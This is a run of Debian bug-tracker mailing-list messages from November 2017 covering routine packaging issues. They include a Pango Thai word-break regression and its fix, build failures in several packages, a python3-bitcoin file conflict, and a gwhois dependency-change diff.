Your message dated Wed, 15 Nov 2017 18:27:56 + with message-idand subject line Bug#880674: fixed in pango1.0 1.40.13-2 has caused the Debian Bug report #880674, regarding libpango-1.0-0: Thai word break stops working since 1.40.13 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 880674: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880674 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: libpango-1.0-0 Version: 1.40.13-1 Severity: important Dear Maintainer, Since Pango 1.40.13, Thai word break appears to be broken. This affects all GTK+-based text editors like gedit, mousepad, leafpad, etc. as well as Mozilla Firefox. Try, for example, opening this page with Firefox: https://linux.thai.net/~thep/text/aphaimanee.html The long continuous-text paragraph is supposed to be wrapped, but it's not. Downgrading Pango to 1.40.12 does solve the problem. Looking at upstream repository, this commit looks like the culprit: https://git.gnome.org/browse/pango/commit/?id=c4619480e536e393e2d4a8e26a6ceb5af1fe80e3 I've tried writing a simple program to test it, and it appears PangoLogAttr::is_char_break for all Thai characters except the first one of the line are cleared to zero, which causes break_thai() in pango/break-thai.c to skip setting is_line_break in all positions. -- System Information: Debian Release: buster/sid APT prefers unstable-debug APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 4.13.0-1-amd64 (SMP w/4 CPU cores) Locale: LANG=th_TH.utf8, LC_CTYPE=th_TH.utf8 (charmap=UTF-8), LANGUAGE=th_TH.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages libpango-1.0-0 depends on: ii fontconfig2.12.3-0.2 ii libc6 2.24-17 ii libglib2.0-0 2.54.2-1 ii libthai0 0.1.27-1 libpango-1.0-0 recommends no packages. libpango-1.0-0 suggests no packages. -- no debconf information --- End Message --- --- Begin Message --- Source: pango1.0 Source-Version: 1.40.13-2 We believe that the bug you reported is fixed in the latest version of pango1.0, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 880...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Michael Biebl (supplier of updated pango1.0 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Wed, 15 Nov 2017 18:39:29 +0100 Source: pango1.0 Binary: libpango1.0-0 libpango-1.0-0 libpangocairo-1.0-0 libpangoxft-1.0-0 libpangoft2-1.0-0 libpango1.0-udeb libpango1.0-dev libpango1.0-doc gir1.2-pango-1.0 pango1.0-tests Architecture: source Version: 1.40.13-2 Distribution: unstable Urgency: medium Maintainer: Debian GNOME Maintainers Changed-By: Michael Biebl Description: gir1.2-pango-1.0 - Layout and rendering of internationalized text - gir bindings libpango-1.0-0 - Layout and rendering of internationalized text libpango1.0-0 - Layout and rendering of internationalized text (transitional pack libpango1.0-dev - Development files for the Pango libpango1.0-doc - Documentation files for the Pango libpango1.0-udeb - Layout and rendering of internationalized text - minimal runtime (udeb) libpangocairo-1.0-0 - Layout and rendering of internationalized text libpangoft2-1.0-0 - Layout and rendering of internationalized text libpangoxft-1.0-0 - Layout and rendering of internationalized text pango1.0-tests - Layout and rendering of internationalized text - installed tests Closes: 880674 Changes: pango1.0 (1.40.13-2) unstable; urgency=medium . [ Simon McVittie ] * gir1.2-pango-1.0 Provides gir1.2-pangocairo-1.0, gir1.2-pangoft2-1.0, gir1.2-pangoxft-1.0 to reflect the additional typelibs that it contains . [ Michael Biebl ] * Add 0001-Fix-is_char_break-issue-in-pango_default_break-funct.patch. Fixes a regression introduced in 1.40.13 resulting in word wrapping / line breaks being broken. (Closes: #880674)
Processed: fixed 881023 in 1.005-5
Processing commands for cont...@bugs.debian.org: > fixed 881023 1.005-5 Bug #881023 {Done: Andreas Tille} [src:librcsb-core-wrapper] librcsb-core-wrapper: FTBFS with xerces-c3.2 Marked as fixed in versions librcsb-core-wrapper/1.005-5. > thanks Stopping processing here. Please contact me if you need assistance. -- 881023: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881023 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Not a problem in stretch
Processing commands for cont...@bugs.debian.org: > tags 881835 buster sid Bug #881835 [src:mbr] mbr FTBFS on !amd64 !i386: debhelper got stricter Added tag(s) buster and sid. > thanks Stopping processing here. Please contact me if you need assistance. -- 881835: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881835 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#851080: marked as done (erlang: Please migrate to openssl1.1 in buster)
Your message dated Wed, 15 Nov 2017 17:21:19 + with message-idand subject line Bug#851080: fixed in erlang 1:20.1.5+dfsg-1 has caused the Debian Bug report #851080, regarding erlang: Please migrate to openssl1.1 in buster to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 851080: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851080 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: erlang Version: 18.3-dfsg-1 Severity: important Control: block 827061 by -1 Hi, OpenSSL 1.1.0 is about to released. During a rebuild of all packages using OpenSSL this package fail to build. A log of that build can be found at: https://breakpoint.cc/openssl-1.1-rebuild-2016-05-29/Attempted/erlang_18.3-dfsg-1_amd64-20160529-1417 On https://wiki.openssl.org/index.php/1.1_API_Changes you can see various of the reasons why it might fail. There are also updated man pages at https://www.openssl.org/docs/manmaster/ that should contain useful information. There is a libssl-dev package available in experimental that contains a recent snapshot, I suggest you try building against that to see if everything works. If you have problems making things work, feel free to contact us. Kurt --- End Message --- --- Begin Message --- Source: erlang Source-Version: 1:20.1.5+dfsg-1 We believe that the bug you reported is fixed in the latest version of erlang, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 851...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Sergei Golovan (supplier of updated erlang package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Wed, 15 Nov 2017 18:57:56 +0300 Source: erlang Binary: erlang-base erlang-base-hipe erlang-asn1 erlang-common-test erlang-corba erlang-crypto erlang-debugger erlang-dialyzer erlang-diameter erlang-doc erlang-edoc erlang-eldap erlang-erl-docgen erlang-et erlang-eunit erlang-ic erlang-ic-java erlang-inets erlang-manpages erlang-megaco erlang-mnesia erlang-observer erlang-odbc erlang-os-mon erlang-parsetools erlang-public-key erlang-reltool erlang-runtime-tools erlang-snmp erlang-ssh erlang-ssl erlang-syntax-tools erlang-tools erlang-wx erlang-xmerl erlang-dev erlang-src erlang-examples erlang-jinterface erlang-mode erlang-nox erlang-x11 erlang Architecture: source amd64 all Version: 1:20.1.5+dfsg-1 Distribution: unstable Urgency: medium Maintainer: Debian Erlang Packagers Changed-By: Sergei Golovan Description: erlang - Concurrent, real-time, distributed functional language erlang-asn1 - Erlang/OTP modules for ASN.1 support erlang-base - Erlang/OTP virtual machine and base applications erlang-base-hipe - Erlang/OTP HiPE enabled virtual machine and base applications erlang-common-test - Erlang/OTP application for automated testing erlang-corba - Erlang/OTP applications for CORBA support erlang-crypto - Erlang/OTP cryptographic modules erlang-debugger - Erlang/OTP application for debugging and testing erlang-dev - Erlang/OTP development libraries and headers erlang-dialyzer - Erlang/OTP discrepancy analyzer application erlang-diameter - Erlang/OTP implementation of RFC 6733 protocol erlang-doc - Erlang/OTP HTML/PDF documentation erlang-edoc - Erlang/OTP module for generating documentation erlang-eldap - Erlang/OTP LDAP library erlang-erl-docgen - Erlang/OTP documentation stylesheets erlang-et - Erlang/OTP event tracer application erlang-eunit - Erlang/OTP module for unit testing erlang-examples - Erlang/OTP application examples erlang-ic - Erlang/OTP IDL compiler erlang-ic-java - Erlang/OTP IDL compiler (Java classes) erlang-inets - Erlang/OTP Internet clients and servers erlang-jinterface - Java communication tool to Erlang erlang-manpages - Erlang/OTP manual pages erlang-megaco - Erlang/OTP implementation of Megaco/H.248 protocol erlang-mnesia - Erlang/OTP distributed relational/object hybrid database erlang-mode - Erlang major editing mode for Emacs erlang-nox - Erlang/OTP applications that don't require X
Bug#881814: Processed: libibverbs-dev no longer ships infiniband/driver.h
> libibverbs-dev > src:librdmacm > src:libcxgb3 > src:libmlx4 > src:libipathverbs > src:libmlx5 > src:libibcm > src:libmthca > src:libnes These are now all part of rdma-core. These packages should be removed from unstable and all other release suites that have rdma-core. It is an error to attempt to build them against rdma-core. > src:libfabric This is has been fixed in libfabric upstream, look for patches from me. Jason
Bug#881835: mbr FTBFS on !amd64 !i386: debhelper got stricter
Source: mbr Version: 1.1.11-5.1 Severity: serious Justification: fails to build from source (but built successfully in the past) User: helm...@debian.org Usertags: rebootstrap E.g. mips64el: | dh_installdirs -p mbr-udeb sbin | dh_installdirs: All requested packages have been excluded (e.g. via a Build-Profile). | dh_installdocs -p mbr debian/README-1st.Debian NEWS README AUTHORS | dh_installdocs: Compatibility levels before 9 are deprecated (level 7 in use) | dh_installchangelogs | dh_installchangelogs: Compatibility levels before 9 are deprecated (level 7 in use) | /usr/bin/make install INSTALL_PROGRAM="install -s" | make[1]: Entering directory '/<>' | make[2]: Entering directory '/<>' | make[3]: Entering directory '/<>' | test -z "/<>/debian/mbr//sbin" || mkdir -p -- "/<>/debian/mbr//sbin" | install -s 'install-mbr' '/<>/debian/mbr//sbin/install-mbr' | test -z "/<>/debian/mbr/usr/share/man/man8" || mkdir -p -- "/<>/debian/mbr/usr/share/man/man8" | /usr/bin/install -c -m 644 './install-mbr.8' '/<>/debian/mbr/usr/share/man/man8/install-mbr.8' | make[3]: Leaving directory '/<>' | make[2]: Leaving directory '/<>' | make[1]: Leaving directory '/<>' | cp `pwd`/debian/mbr/sbin/install-mbr `pwd`/debian/mbr-udeb/sbin/ | cp: cannot create regular file '/<>/debian/mbr-udeb/sbin/': No such file or directory | debian/rules:34: recipe for target 'install' failed | make: *** [install] Error 1 | dpkg-buildpackage: error: fakeroot debian/rules binary-arch subprocess returned exit status 2 https://tests.reproducible-builds.org/debian/rb-pkg/unstable/arm64/mbr.html https://tests.reproducible-builds.org/debian/rb-pkg/unstable/armhf/mbr.html This is likely because debhelper became more strict recently. You cannot reproduce this on amd64 or i386 (except by cross building). Helmut
Bug#681726: Time to remove eclipse from Testing?
Le 15/11/2017 à 17:01, Adrian Bunk a écrit : > 2. batik -> maven -> guice -> libspring-java -> aspectj -> eclipse-platform > Is there some good way to break this dependency chain? I suspect we build the aspectj eclipse plugin but don't even install it in the binary package. I'll see if this can be disabled. Emmanuel Bourg
Bug#881832: python3-bitcoinlib,python3-bitcoin: duplicate packages?
Package: python3-bitcoinlib,python3-bitcoin Severity: serious User: trei...@debian.org Usertags: edos-file-overwrite Control: found -1 0.8.0-1 Control: found -1 1.1.42-1 Hi, automatic installation tests of packages that share a file and at the same time do not conflict by their package dependency relationships has detected the following problem: Selecting previously unselected package python3-bitcoin. Preparing to unpack .../python3-bitcoin_1.1.42-1_all.deb ... Unpacking python3-bitcoin (1.1.42-1) ... dpkg: error processing archive /var/cache/apt/archives/python3-bitcoin_1.1.42-1_all.deb (--unpack): trying to overwrite '/usr/lib/python3/dist-packages/bitcoin/__init__.py', which is also in package python3-bitcoinlib 0.8.0-1 Errors were encountered while processing: /var/cache/apt/archives/python3-bitcoin_1.1.42-1_all.deb This is a serious bug as it makes installation fail, and violates sections 7.6.1 and 10.1 of the policy. An optimal solution would consist in only one of the packages installing that file, and renaming or removing the file in the other package. Depending on the circumstances you might also consider Replace relations or file diversions. If the conflicting situation cannot be resolved then, as a last resort, the two packages have to declare a mutual Conflict. Please take into account that Replaces, Conflicts and diversions should only be used when packages provide different implementations for the same functionality. Here is a list of files that are known to be shared by both packages (according to the Contents file for sid/amd64, which may be slightly out of sync): usr/lib/python3/dist-packages/bitcoin/__init__.py This bug is assigned to both packages. If you, the maintainers of the two packages in question, have agreed on which of the packages will resolve the problem please reassign the bug to that package. You may also register in the BTS that the other package is affected by the bug. cheers, Andreas PS: for more information about the detection of file overwrite errors of this kind see https://qa.debian.org/dose/file-overwrites.html python3-bitcoinlib=0.8.0-1_python3-bitcoin=1.1.42-1.log.gz Description: application/gzip
Processed: python3-bitcoinlib,python3-bitcoin: duplicate packages?
Processing control commands: > found -1 0.8.0-1 Bug #881832 [python3-bitcoinlib,python3-bitcoin] python3-bitcoinlib,python3-bitcoin: duplicate packages? There is no source info for the package 'python3-bitcoin' at version '0.8.0-1' with architecture '' Marked as found in versions python-bitcoinlib/0.8.0-1. > found -1 1.1.42-1 Bug #881832 [python3-bitcoinlib,python3-bitcoin] python3-bitcoinlib,python3-bitcoin: duplicate packages? There is no source info for the package 'python3-bitcoinlib' at version '1.1.42-1' with architecture '' Marked as found in versions pybitcointools/1.1.42-1. -- 881832: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881832 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Close bug already marked as fixed
Processing commands for cont...@bugs.debian.org: > close 877310 Bug #877310 [src:nbdkit] nbdkit FTBFS on armhf/i386: FAIL: test-socket-activation Marked Bug as done > thanks Stopping processing here. Please contact me if you need assistance. -- 877310: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877310 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#681726: Time to remove eclipse from Testing?
On Wed, Nov 15, 2017 at 12:08:10AM +0100, Markus Koschany wrote: >... > We should definitely try to avoid this sort of dependency mess in the > future by packaging important libraries like eclipse-rcp in a separate > source package. That would be similar to what we are doing whith > Netbeans and libnb-platform18-java at the moment. It simply ensures that > we can resolve such issues more easily by dropping the hard to maintain > IDE but keeping other important dependencies which don't require that > much effort in theory. I tried to sort out what I could find as required for getting the ancient eclipse out of testing in [1]: 1. src:bnd You fixed that already. 2. batik -> maven -> guice -> libspring-java -> aspectj -> eclipse-platform Is there some good way to break this dependency chain? 3. split libequinox-osgi-java out of src:eclise Or as a short-term hack, build only libequinox-osgi-java from src:eclipse. > Regards, > > Markus cu Adrian [1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880470#10 -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Bug#881058: gwhois: diff for NMU version 20120626-1.2
Control: tags 881058 + patch Control: tags 881058 + pending Dear maintainer, I've prepared an NMU for gwhois (versioned as 20120626-1.2) and uploaded it to DELAYED/15. Please feel free to tell me if I should delay it longer. Regards. -- .''`. https://info.comodo.priv.at/ - Debian Developer https://www.debian.org : :' : OpenPGP fingerprint D1E1 316E 93A7 60A8 104D 85FA BB3A 6801 8649 AA06 `. `' Member of VIBE!AT & SPI, fellow of the Free Software Foundation Europe `- NP: Ostbahn-Kurti & Die Chefpartie: Da Joker diff -Nru gwhois-20120626/debian/changelog gwhois-20120626/debian/changelog --- gwhois-20120626/debian/changelog 2017-07-15 01:12:47.0 +0200 +++ gwhois-20120626/debian/changelog 2017-11-15 16:44:51.0 +0100 @@ -1,3 +1,12 @@ +gwhois (20120626-1.2) unstable; urgency=medium + + * Non-maintainer upload. + * Fix "please switch Depends from lynx-cur to lynx": +do as the bug report requests. +(Closes: #881058) + + -- gregor herrmannWed, 15 Nov 2017 16:44:51 +0100 + gwhois (20120626-1.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru gwhois-20120626/debian/control gwhois-20120626/debian/control --- gwhois-20120626/debian/control 2015-04-17 23:30:06.0 +0200 +++ gwhois-20120626/debian/control 2017-11-15 16:43:54.0 +0100 @@ -7,7 +7,7 @@ Package: gwhois Architecture: all -Depends: ${misc:Depends}, debconf | debconf-2.0, perl, libwww-perl, lynx-cur, curl, libnet-libidn-perl +Depends: ${misc:Depends}, debconf | debconf-2.0, perl, libwww-perl, lynx, curl, libnet-libidn-perl Suggests: openbsd-inetd | inet-superserver Description: generic Whois Client / Server gwhois is a generic whois client / server. This means that it know signature.asc Description: Digital Signature
Processed: gwhois: diff for NMU version 20120626-1.2
Processing control commands: > tags 881058 + patch Bug #881058 [gwhois] gwhois: please switch Depends from lynx-cur to lynx Added tag(s) patch. > tags 881058 + pending Bug #881058 [gwhois] gwhois: please switch Depends from lynx-cur to lynx Added tag(s) pending. -- 881058: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881058 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881827: pykde4 FTBFS: sip: ::KFontChooser ctor argument 5 has an unsupported type for a Python signature
Source: pykde4 Version: 4:4.14.3-3 Severity: serious Some recent change in unstable makes pykde4 FTBFS: https://teshttps://tests.reproducible-builds.org/debian/history/pykde4.html ts.reproducible-builds.org/debian/rb-pkg/unstable/amd64/pykde4.html ... sip: ::KFontChooser ctor argument 5 has an unsupported type for a Python signature - provide a valid type, %MethodCode and a C++ signature CMakeFiles/python_module_PyKDE4_kio.dir/build.make:185: recipe for target 'sip/kio/sipkiopart0.cpp' failed make[5]: *** [sip/kio/sipkiopart0.cpp] Error 1
Bug#881824: openjdk-7-jre-dcevm: FTBFS due to -Werror=format-overflow
Source: openjdk-7-jre-dcevm Version: 7u79-4 Severity: serious Justification: fails to build from source (but built successfully in the past) Hi, openjdk-7-jre-dcevm FTBFS in a current sid+experimental environment: Compiling /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp rm -f ../generated/adfiles/output_c.o g++ -DLINUX -D_GNU_SOURCE -DIA32 -I/build/openjdk-7-jre-dcevm-7u79/src/share/vm/prims -I/build/openjdk-7-jre-dcevm-7u79/src/share/vm -I/build/openjdk-7-jre-dcevm-7u79/src/share/vm/precompiled -I/build/openjdk-7-jr e-dcevm-7u79/src/cpu/x86/vm -I/build/openjdk-7-jre-dcevm-7u79/src/os_cpu/linux_x86/vm -I/build/openjdk-7-jre-dcevm-7u79/src/os/linux/vm -I/build/openjdk-7-jre-dcevm-7u79/src/os/posix/vm -I/build/openjdk-7-jre-dcev m-7u79/src/share/vm/adlc -I../generated -DASSERT -g -O2 -fdebug-prefix-map=/build/openjdk-7-jre-dcevm-7u79=. -fstack-protector-strong -Wformat -Werror=format-security -DTARGET_OS_FAMILY_linux -DTARGET_ARCH_x86 -DT ARGET_ARCH_MODEL_x86_32 -DTARGET_OS_ARCH_linux_x86 -DTARGET_OS_ARCH_MODEL_linux_x86_32 -DTARGET_COMPILER_gcc -DCOMPILER2 -DCOMPILER1 -fno-rtti -fno-exceptions -D_REENTRANT -fcheck-new -fvisibility=hidden -m32 -ma rch=i586 -pipe -g -DTARGET_OS_FAMILY_linux -DTARGET_ARCH_x86 -DTARGET_ARCH_MODEL_x86_32 -DTARGET_OS_ARCH_linux_x86 -DTARGET_OS_ARCH_MODEL_linux_x86_32 -DTARGET_COMPILER_gcc -DCOMPILER2 -DCOMPILER1 -fno-rtti -fno- exceptions -D_REENTRANT -fcheck-new -fvisibility=hidden -m32 -march=i586 -pipe -g -Werror -c -o ../generated/adfiles/output_c.o /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp: In member function 'void ArchDesc::build_pipe_classes(FILE*)': /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp:601:6: error: '%*d' directive output between 1 and 2147483647 bytes may cause result to exceed 'INT_MAX' [-Werror=format-overflow=] void ArchDesc::build_pipe_classes(FILE *fp_cpp) { ^~~~ /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp:601:6: note: directive argument in the range [0, 2147483647] cc1plus: all warnings being treated as errors /build/openjdk-7-jre-dcevm-7u79/make/linux/makefiles/adlc.make:214: recipe for target '../generated/adfiles/output_c.o' failed make[6]: *** [../generated/adfiles/output_c.o] Error 1 This is likely a new warning in the current gcc. Andreas openjdk-7-jre-dcevm_7u79-4.log.gz Description: application/gzip
Bug#881821: stylish-haskell build depends on libghc-syb-dev (< 0.7) but 0.7-1 is to be installed
Source: stylish-haskell Version: 0.7.1.0-1 Severity: serious The following packages have unmet dependencies: builddeps:stylish-haskell : Depends: libghc-syb-dev (< 0.7) but 0.7-1 is to be installed
Bug#881820: pkg-haskell-tools build depends on libghc-concurrent-output-dev (< 1.8) but 1.9.2-1 is to be installed
Source: pkg-haskell-tools Version: 0.11.0 Severity: serious The following packages have unmet dependencies: builddeps:pkg-haskell-tools : Depends: libghc-concurrent-output-dev (< 1.8) but 1.9.2-1 is to be installed
Bug#881816: openstack-dashboard: fails to install non-interactively: postinst debconfage fails
Package: openstack-dashboard Version: 3:12.0.0-3 Severity: serious Justification: fails to install, makes rbdeps FTBFS Hi! When installing openstack-dashboard non-interactively, it fails with: Setting up openstack-dashboard (3:12.0.0-3) ... dpkg: error processing package openstack-dashboard (--configure): installed openstack-dashboard package post-installation script subprocess returned error exit status 30 Interactively, it asks questions then succeeds. But as it's a build-dependency of several packages (ironic-ui, manila-ui, etc), it must be installable inside sbuild. Meow! -- System Information: Debian Release: buster/sid APT prefers unstable-debug APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: armhf (armv7l) Kernel: Linux 4.14.0-00115-g3d7c587c4c1b (SMP w/4 CPU cores; PREEMPT) Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE=C.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: sysvinit (via /sbin/init) Versions of packages openstack-dashboard depends on: ii adduser3.116 ii debconf [debconf-2.0] 1.5.65 pn libjs-jquery pn libjs-jquery-cookie pn python pn python-django-horizon openstack-dashboard recommends no packages. Versions of packages openstack-dashboard suggests: pn memcached pn openstack-dashboard-apache
Bug#881815: wagon2: missing build dependency on libplexus-classworlds2-java
Source: wagon2 Version: 2.12-3 Severity: serious https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/wagon2.html ... [WARNING] The POM for org.codehaus.plexus:plexus-classworlds:jar:2.x is missing, no dependency information available [WARNING] The artifact org.codehaus.plexus:plexus-container-default:jar:1.5.5 has been relocated to org.codehaus.plexus:plexus-container-default:jar:debian [INFO] [INFO] Reactor Summary: [INFO] [INFO] Apache Maven Wagon . SUCCESS [ 0.599 s] [INFO] Apache Maven Wagon :: API .. SUCCESS [ 3.703 s] [INFO] Apache Maven Wagon :: Provider Test SUCCESS [ 1.455 s] [INFO] Apache Maven Wagon :: Providers SUCCESS [ 0.027 s] [INFO] Apache Maven Wagon :: Providers :: File Provider ... SUCCESS [ 0.293 s] [INFO] Apache Maven Wagon :: Providers :: FTP Provider SUCCESS [ 0.430 s] [INFO] Apache Maven Wagon :: Providers :: HTTP Shared Library SUCCESS [ 0.228 s] [INFO] Apache Maven Wagon :: Test Compatibility Kits .. SUCCESS [ 0.006 s] [INFO] Apache Maven Wagon :: HTTP Test Compatibility Kit .. FAILURE [ 0.016 s] [INFO] Apache Maven Wagon :: Providers :: HTTP Provider ... SKIPPED [INFO] Apache Maven Wagon :: Providers :: Lightweight HTTP Provider SKIPPED [INFO] [INFO] BUILD FAILURE [INFO] [INFO] Total time: 7.167 s [INFO] Finished at: 2018-12-17T19:20:44-12:00 [INFO] Final Memory: 25M/594M [INFO] [ERROR] Failed to execute goal on project wagon-tck-http: Could not resolve dependencies for project org.apache.maven.wagon:wagon-tck-http:jar:2.12: Cannot access central (https://repo.maven.apache.org/maven2) in offline mode and the artifact org.codehaus.plexus:plexus-classworlds:jar:2.x has not been downloaded from it before. -> [Help 1] [ERROR] [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch. [ERROR] Re-run Maven using the -X switch to enable full debug logging. [ERROR] [ERROR] For more information about the errors and possible solutions, please read the following articles: [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/DependencyResolutionException [ERROR] [ERROR] After correcting the problems, you can resume the build with the command [ERROR] mvn -rf :wagon-tck-http dh_auto_build: /usr/lib/jvm/default-java/bin/java -noverify -cp /usr/share/maven/boot/plexus-classworlds-2.x.jar:/usr/lib/jvm/default-java/lib/tools.jar -Dmaven.home=/usr/share/maven -Dmaven.multiModuleProjectDirectory=/build/1st/wagon2-2.12 -Dclassworlds.conf=/etc/maven/m2-debian.conf -Dproperties.file.manual=/build/1st/wagon2-2.12/debian/maven.properties org.codehaus.plexus.classworlds.launcher.Launcher -s/etc/maven/settings-debian.xml -Ddebian.dir=/build/1st/wagon2-2.12/debian -Dmaven.repo.local=/build/1st/wagon2-2.12/debian/maven-repo --batch-mode package -DskipTests -Dnotimestamp=true -Dlocale=en_US returned exit code 1 debian/rules:9: recipe for target 'override_dh_auto_build' failed make[1]: *** [override_dh_auto_build] Error 1
Processed: #859716 seafile-client: Please migrate to openssl1.1 in Buster
Processing commands for cont...@bugs.debian.org: > forwarded 859716 https://github.com/haiwen/seafile-client/issues/853 Bug #859716 [seafile-client] seafile-client: Please migrate to openssl1.1 in Buster Changed Bug forwarded-to-address to 'https://github.com/haiwen/seafile-client/issues/853' from 'https://github.com/haiwen/seafile-client/pull/940'. > thanks Stopping processing here. Please contact me if you need assistance. -- 859716: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859716 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881814: libibverbs-dev no longer ships infiniband/driver.h
Source: rdma-core Version: 15-1 Severity: serious Control: affects -1 libibverbs-dev src:librdmacm src:libcxgb3 src:libmlx4 src:libipathverbs src:libmlx5 src:libibcm src:libmthca src:libnes src:libfabric Many packages FTBFS due to libibverbs-dev no longer shipping infiniband/driver.h, e.g.: https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/libipathverbs.html ... checking infiniband/driver.h usability... no checking infiniband/driver.h presence... no checking for infiniband/driver.h... no configure: error: not found. libipathverbs requires libibverbs.
Processed: libibverbs-dev no longer ships infiniband/driver.h
Processing control commands: > affects -1 libibverbs-dev src:librdmacm src:libcxgb3 src:libmlx4 > src:libipathverbs src:libmlx5 src:libibcm src:libmthca src:libnes > src:libfabric Bug #881814 [src:rdma-core] libibverbs-dev no longer ships infiniband/driver.h Added indication that 881814 affects libibverbs-dev, src:librdmacm, src:libcxgb3, src:libmlx4, src:libipathverbs, src:libmlx5, src:libibcm, src:libmthca, src:libnes, and src:libfabric -- 881814: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881814 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#880958: yapf3 explicitly depends on python3.5
Have replied to you from the respective bugs. Thank you, Ana On Tue, Nov 14, 2017, at 10:36 PM, Ghislain Vaillant wrote: > What about the patches fixing the other two bugs affecting yapf? > Please consider checking the BTS.> > Ghis > > > Le 14 nov. 2017 22:25, "Ana C. Custura"a écrit :>> Hi > Ghis, >> >> Thank you for the reply. There is a package on mentors that addresses>> both >> this bug (88958) and the split (879196) bug you raised. I am >> waiting for my mentor to review it before uploading. >> >> Ana >> >> On Tue, Nov 14, 2017, at 08:59 AM, Ghislain Vaillant wrote: >> > Thank you Matthias for raising this issue. CC'ing the maintainer >> > in case>> > she's not subscribed. >> > >> > On Mon, 6 Nov 2017 11:52:00 +0100 Matthias Klose >> > wrote:>> > > Package: yapf3 >> > > Version: 0.17.0-1 >> > > Severity: serious >> > > Tags: sid buster >> > > >> > > yapf3 explicitly depends on python3.5. One mistake certainly is >> > > the b-d on>> > > python3-all, which is wrong for an application-only >> > > package. >> > >> > The application is not compliant with the Python packaging >> > guidelines.>> > The public modules should be split from the application >> > package. See>> > #879196 for a discussion about it. >> > >> > I have proposed a patch offline but it has yet to be applied. >> > Fixing>> > #879196 will transitively fix the issue you just reported. >> > >> > > And if this package is application-only, why ship both Python2 >> > > and Python3 vesions?>> > >> > It is nether application-only, nor Python 3 specific. >> > >> > Cheers, >> > Ghis
Processed: New libcdio is now in unstable
Processing commands for cont...@bugs.debian.org: > severity 879891 serious Bug #879891 {Done: gregor herrmann} [src:libdevice-cdio-perl] libdevice-cdio-perl: FTBFS against libcdio-dev 0.92 Severity set to 'serious' from 'important' > thanks Stopping processing here. Please contact me if you need assistance. -- 879891: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879891 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Add found version and affects
Processing commands for cont...@bugs.debian.org: > found 881743 0.5.0-1 Bug #881743 {Done: Thomas Goirand} [fonts-roboto-fontface] openstack-dashboard: fails to upgrade from 'stretch': Couldn't find anything to import: /horizon/lib/roboto_fontface/css/roboto-fontface.scss Marked as found in versions fonts-roboto-fontface/0.5.0-1. > affects 881743 openstack-dashboard Bug #881743 {Done: Thomas Goirand } [fonts-roboto-fontface] openstack-dashboard: fails to upgrade from 'stretch': Couldn't find anything to import: /horizon/lib/roboto_fontface/css/roboto-fontface.scss Added indication that 881743 affects openstack-dashboard > thanks Stopping processing here. Please contact me if you need assistance. -- 881743: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881743 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
